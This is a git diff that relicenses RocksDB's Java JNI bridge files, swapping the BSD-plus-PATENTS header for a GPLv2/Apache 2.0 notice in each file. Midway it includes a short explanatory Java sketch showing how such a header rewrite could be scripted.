-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // This file implements the "bridge" between Java and C++ and enables
 // calling c++ rocksdb::BackupEnginge and rocksdb::BackupableDBOptions methods
diff --git a/java/rocksjni/backupenginejni.cc b/java/rocksjni/backupenginejni.cc
index 5cf39b32a29..004de976cbe 100644
--- a/java/rocksjni/backupenginejni.cc
+++ b/java/rocksjni/backupenginejni.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // This file implements the "bridge" between Java and C++ and enables
 // calling C++ rocksdb::BackupEngine methods from the Java side.
diff --git a/java/rocksjni/cassandra_value_operator.cc b/java/rocksjni/cassandra_value_operator.cc
index 17410bd12ae..889213b9c8a 100644
--- a/java/rocksjni/cassandra_value_operator.cc
+++ b/java/rocksjni/cassandra_value_operator.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2017-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 // This source code is also licensed under the GPLv2 license found in the
 // COPYING file in the root directory of this source tree.
diff --git a/java/rocksjni/checkpoint.cc b/java/rocksjni/checkpoint.cc
index 9832d1a939f..426f5d029e2 100644
--- a/java/rocksjni/checkpoint.cc
+++ b/java/rocksjni/checkpoint.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // This file implements the "bridge" between Java and C++ and enables
 // calling c++ rocksdb::Checkpoint methods from Java side.
diff --git a/java/rocksjni/clock_cache.cc b/java/rocksjni/clock_cache.cc
index 1776ae058f9..0a4d7b28d65 100644
--- a/java/rocksjni/clock_cache.cc
+++ b/java/rocksjni/clock_cache.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // This file implements the "bridge" between Java and C++ for
 // rocksdb::ClockCache.
diff --git a/java/rocksjni/columnfamilyhandle.cc b/java/rocksjni/columnfamilyhandle.cc
index 1fb8507741f..6e40a7e010b 100644
--- a/java/rocksjni/columnfamilyhandle.cc
+++ b/java/rocksjni/columnfamilyhandle.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // This file implements the "bridge" between Java and C++ and enables
 // calling c++ rocksdb::Iterator methods from Java side.
diff --git a/java/rocksjni/compaction_filter.cc b/java/rocksjni/compaction_filter.cc
index 77ee4d5b5c8..72de46b3fba 100644
--- a/java/rocksjni/compaction_filter.cc
+++ b/java/rocksjni/compaction_filter.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // This file implements the "bridge" between Java and C++ for
 // rocksdb::CompactionFilter.
diff --git a/java/rocksjni/compaction_options_fifo.cc b/java/rocksjni/compaction_options_fifo.cc
index 99a2847cbfe..ef04d81c648 100644
--- a/java/rocksjni/compaction_options_fifo.cc
+++ b/java/rocksjni/compaction_options_fifo.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // This file implements the "bridge" between Java and C++ for
 // rocksdb::CompactionOptionsFIFO.
diff --git a/java/rocksjni/compaction_options_universal.cc b/java/rocksjni/compaction_options_universal.cc
index 74c02886ead..d397db8e438 100644
--- a/java/rocksjni/compaction_options_universal.cc
+++ b/java/rocksjni/compaction_options_universal.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // This file implements the "bridge" between Java and C++ for
 // rocksdb::CompactionOptionsUniversal.
diff --git a/java/rocksjni/comparator.cc b/java/rocksjni/comparator.cc
index aeeb607ab75..5955d0bf75e 100644
--- a/java/rocksjni/comparator.cc
+++ b/java/rocksjni/comparator.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // This file implements the "bridge" between Java and C++ for
 // rocksdb::Comparator.
diff --git a/java/rocksjni/comparatorjnicallback.cc b/java/rocksjni/comparatorjnicallback.cc
index ab868c85da0..73ab46ad218 100644
--- a/java/rocksjni/comparatorjnicallback.cc
+++ b/java/rocksjni/comparatorjnicallback.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // This file implements the callback "bridge" between Java and C++ for
 // rocksdb::Comparator.
diff --git a/java/rocksjni/comparatorjnicallback.h b/java/rocksjni/comparatorjnicallback.h
index ede1292612a..a753008b338 100644
--- a/java/rocksjni/comparatorjnicallback.h
+++ b/java/rocksjni/comparatorjnicallback.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // This file implements the callback "bridge" between Java and C++ for
 // rocksdb::Comparator and rocksdb::DirectComparator.
diff --git a/java/rocksjni/compression_options.cc b/java/rocksjni/compression_options.cc
index a1c2aa154f0..7d5af645ae8 100644
--- a/java/rocksjni/compression_options.cc
+++ b/java/rocksjni/compression_options.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // This file implements the "bridge" between Java and C++ for
 // rocksdb::CompressionOptions.
diff --git a/java/rocksjni/env.cc b/java/rocksjni/env.cc
index 2826c5c8927..dc949a07fa0 100644
--- a/java/rocksjni/env.cc
+++ b/java/rocksjni/env.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // This file implements the "bridge" between Java and C++ and enables
 // calling c++ rocksdb::Env methods from Java side.
diff --git a/java/rocksjni/env_options.cc b/java/rocksjni/env_options.cc
index 77703ff6e12..538b0b69f74 100644
--- a/java/rocksjni/env_options.cc
+++ b/java/rocksjni/env_options.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ and enables // calling C++ rocksdb::EnvOptions methods diff --git a/java/rocksjni/filter.cc b/java/rocksjni/filter.cc index 2bc84b438ef..7b186b8943c 100644 --- a/java/rocksjni/filter.cc +++ b/java/rocksjni/filter.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ for // rocksdb::FilterPolicy. diff --git a/java/rocksjni/ingest_external_file_options.cc b/java/rocksjni/ingest_external_file_options.cc index 006ce14e42a..251a6e3c627 100644 --- a/java/rocksjni/ingest_external_file_options.cc +++ b/java/rocksjni/ingest_external_file_options.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ for // rocksdb::FilterPolicy. diff --git a/java/rocksjni/iterator.cc b/java/rocksjni/iterator.cc index 860c2653012..3ac9d5033f2 100644 --- a/java/rocksjni/iterator.cc +++ b/java/rocksjni/iterator.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ and enables // calling c++ rocksdb::Iterator methods from Java side. diff --git a/java/rocksjni/loggerjnicallback.cc b/java/rocksjni/loggerjnicallback.cc index 74e6eb9ac94..09140ed709a 100644 --- a/java/rocksjni/loggerjnicallback.cc +++ b/java/rocksjni/loggerjnicallback.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. 
+// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the callback "bridge" between Java and C++ for // rocksdb::Logger. diff --git a/java/rocksjni/loggerjnicallback.h b/java/rocksjni/loggerjnicallback.h index cf9030e5112..2db85975d66 100644 --- a/java/rocksjni/loggerjnicallback.h +++ b/java/rocksjni/loggerjnicallback.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the callback "bridge" between Java and C++ for // rocksdb::Logger diff --git a/java/rocksjni/lru_cache.cc b/java/rocksjni/lru_cache.cc index 87b45b0f039..16582689e79 100644 --- a/java/rocksjni/lru_cache.cc +++ b/java/rocksjni/lru_cache.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ for // rocksdb::LRUCache. diff --git a/java/rocksjni/memtablejni.cc b/java/rocksjni/memtablejni.cc index ead038d50b3..56a04f9f814 100644 --- a/java/rocksjni/memtablejni.cc +++ b/java/rocksjni/memtablejni.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ for MemTables. diff --git a/java/rocksjni/merge_operator.cc b/java/rocksjni/merge_operator.cc index eb753ae421e..1b94382ef04 100644 --- a/java/rocksjni/merge_operator.cc +++ b/java/rocksjni/merge_operator.cc @@ -1,7 +1,7 @@ // Copyright (c) 2014, Vlad Balan (vlad.gm@gmail.com). All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ // for rocksdb::MergeOperator. 
diff --git a/java/rocksjni/options.cc b/java/rocksjni/options.cc index 295aa6493f6..8194abaf6b6 100644 --- a/java/rocksjni/options.cc +++ b/java/rocksjni/options.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ for rocksdb::Options. diff --git a/java/rocksjni/portal.h b/java/rocksjni/portal.h index 91f6fef79c8..ed671ce6e95 100644 --- a/java/rocksjni/portal.h +++ b/java/rocksjni/portal.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // This file is designed for caching those frequently used IDs and provide // efficient portal (i.e, a set of static functions) to access java code diff --git a/java/rocksjni/ratelimiterjni.cc b/java/rocksjni/ratelimiterjni.cc index 99d4f30fd5f..b4174ff102e 100644 --- a/java/rocksjni/ratelimiterjni.cc +++ b/java/rocksjni/ratelimiterjni.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ for RateLimiter. diff --git a/java/rocksjni/remove_emptyvalue_compactionfilterjni.cc b/java/rocksjni/remove_emptyvalue_compactionfilterjni.cc index ef17efeec61..8c54a46b864 100644 --- a/java/rocksjni/remove_emptyvalue_compactionfilterjni.cc +++ b/java/rocksjni/remove_emptyvalue_compactionfilterjni.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include <jni.h> diff --git a/java/rocksjni/restorejni.cc b/java/rocksjni/restorejni.cc index 84c8706f012..eb8e65b4a1b 100644 --- a/java/rocksjni/restorejni.cc +++ b/java/rocksjni/restorejni.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree.
An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ and enables // calling C++ rocksdb::RestoreOptions methods diff --git a/java/rocksjni/rocksdb_exception_test.cc b/java/rocksjni/rocksdb_exception_test.cc index 87900d3c1b0..339d4c5eda3 100644 --- a/java/rocksjni/rocksdb_exception_test.cc +++ b/java/rocksjni/rocksdb_exception_test.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include <jni.h> diff --git a/java/rocksjni/rocksjni.cc b/java/rocksjni/rocksjni.cc index 0044271470f..a08a4597142 100644 --- a/java/rocksjni/rocksjni.cc +++ b/java/rocksjni/rocksjni.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ and enables // calling c++ rocksdb::DB methods from Java side. diff --git a/java/rocksjni/slice.cc b/java/rocksjni/slice.cc index a630e9990f6..ef0e384f1a4 100644 --- a/java/rocksjni/slice.cc +++ b/java/rocksjni/slice.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ for // rocksdb::Slice. diff --git a/java/rocksjni/snapshot.cc b/java/rocksjni/snapshot.cc index fa8ede7abce..04a0ebfbafa 100644 --- a/java/rocksjni/snapshot.cc +++ b/java/rocksjni/snapshot.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++.
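Every hunk in this patch makes the same mechanical change: the three-line BSD+PATENTS notice is replaced verbatim by the three-line dual GPLv2/Apache-2.0 notice, with the rest of each header left untouched. The following is a minimal Java sketch of how such a bulk rewrite could be scripted; the RelicenseHeaders class, the file-extension filter, and the exact-match assumption are illustrative only and are not part of this patch or of how the change was actually produced.

import java.io.IOException;
import java.io.UncheckedIOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.stream.Stream;

public class RelicenseHeaders {
  // The verbatim header being removed (taken from the '-' lines of this patch).
  static final String OLD_HEADER =
      "// This source code is licensed under the BSD-style license found in the\n"
    + "// LICENSE file in the root directory of this source tree. An additional grant\n"
    + "// of patent rights can be found in the PATENTS file in the same directory.";

  // The replacement header (taken from the '+' lines of this patch).
  static final String NEW_HEADER =
      "// This source code is licensed under both the GPLv2 (found in the\n"
    + "// COPYING file in the root directory) and Apache 2.0 License\n"
    + "// (found in the LICENSE.Apache file in the root directory).";

  public static void main(String[] args) throws IOException {
    // args[0] is the repository root; rewrite every .cc, .h, and .java file under it.
    try (Stream<Path> paths = Files.walk(Paths.get(args[0]))) {
      paths.filter(Files::isRegularFile)
           .filter(p -> p.toString().matches(".*\\.(cc|h|java)"))
           .forEach(RelicenseHeaders::rewrite);
    }
  }

  private static void rewrite(Path file) {
    try {
      String text = new String(Files.readAllBytes(file));
      // Only touch files that contain the old header verbatim; others are left as-is.
      if (text.contains(OLD_HEADER)) {
        Files.write(file, text.replace(OLD_HEADER, NEW_HEADER).getBytes());
      }
    } catch (IOException e) {
      throw new UncheckedIOException(e);
    }
  }
}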
diff --git a/java/rocksjni/sst_file_writerjni.cc b/java/rocksjni/sst_file_writerjni.cc index ae8417c19ac..40595fb95df 100644 --- a/java/rocksjni/sst_file_writerjni.cc +++ b/java/rocksjni/sst_file_writerjni.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ and enables // calling C++ rocksdb::SstFileWriter methods diff --git a/java/rocksjni/statistics.cc b/java/rocksjni/statistics.cc index 4b687780666..7b657ada7b6 100644 --- a/java/rocksjni/statistics.cc +++ b/java/rocksjni/statistics.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ and enables // calling c++ rocksdb::Statistics methods from Java side. diff --git a/java/rocksjni/statisticsjni.cc b/java/rocksjni/statisticsjni.cc index dc1d8f9f801..584ab5aa610 100644 --- a/java/rocksjni/statisticsjni.cc +++ b/java/rocksjni/statisticsjni.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the callback "bridge" between Java and C++ for // rocksdb::Statistics diff --git a/java/rocksjni/statisticsjni.h b/java/rocksjni/statisticsjni.h index d7c3ef3aab3..600d9a67632 100644 --- a/java/rocksjni/statisticsjni.h +++ b/java/rocksjni/statisticsjni.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the callback "bridge" between Java and C++ for // rocksdb::Statistics diff --git a/java/rocksjni/table.cc b/java/rocksjni/table.cc index 204d1ba38f8..5f0a4735fed 100644 --- a/java/rocksjni/table.cc +++ b/java/rocksjni/table.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. 
-// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ for rocksdb::Options. diff --git a/java/rocksjni/transaction_log.cc b/java/rocksjni/transaction_log.cc index ed44976fd77..a5049e3b26a 100644 --- a/java/rocksjni/transaction_log.cc +++ b/java/rocksjni/transaction_log.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ and enables // calling c++ rocksdb::Iterator methods from Java side. diff --git a/java/rocksjni/ttl.cc b/java/rocksjni/ttl.cc index 31fdd74ada5..a66ad86d626 100644 --- a/java/rocksjni/ttl.cc +++ b/java/rocksjni/ttl.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ and enables // calling c++ rocksdb::TtlDB methods. diff --git a/java/rocksjni/write_batch.cc b/java/rocksjni/write_batch.cc index 502e1849d76..e84f6ed7d18 100644 --- a/java/rocksjni/write_batch.cc +++ b/java/rocksjni/write_batch.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ and enables // calling c++ rocksdb::WriteBatch methods from Java side. diff --git a/java/rocksjni/write_batch_test.cc b/java/rocksjni/write_batch_test.cc index 06ca4f296f3..0654e01588e 100644 --- a/java/rocksjni/write_batch_test.cc +++ b/java/rocksjni/write_batch_test.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. 
+// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ and enables // calling c++ rocksdb::WriteBatch methods testing from Java side. diff --git a/java/rocksjni/write_batch_with_index.cc b/java/rocksjni/write_batch_with_index.cc index 6a382f894c1..53f2a11d121 100644 --- a/java/rocksjni/write_batch_with_index.cc +++ b/java/rocksjni/write_batch_with_index.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ and enables // calling c++ rocksdb::WriteBatchWithIndex methods from Java side. diff --git a/java/rocksjni/writebatchhandlerjnicallback.cc b/java/rocksjni/writebatchhandlerjnicallback.cc index 2be225b2eb0..0f00766c532 100644 --- a/java/rocksjni/writebatchhandlerjnicallback.cc +++ b/java/rocksjni/writebatchhandlerjnicallback.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the callback "bridge" between Java and C++ for // rocksdb::Comparator. diff --git a/java/rocksjni/writebatchhandlerjnicallback.h b/java/rocksjni/writebatchhandlerjnicallback.h index 791dd9ae9b1..5d3dee3b1a8 100644 --- a/java/rocksjni/writebatchhandlerjnicallback.h +++ b/java/rocksjni/writebatchhandlerjnicallback.h @@ -1,7 +1,7 @@ // Copyright (c) 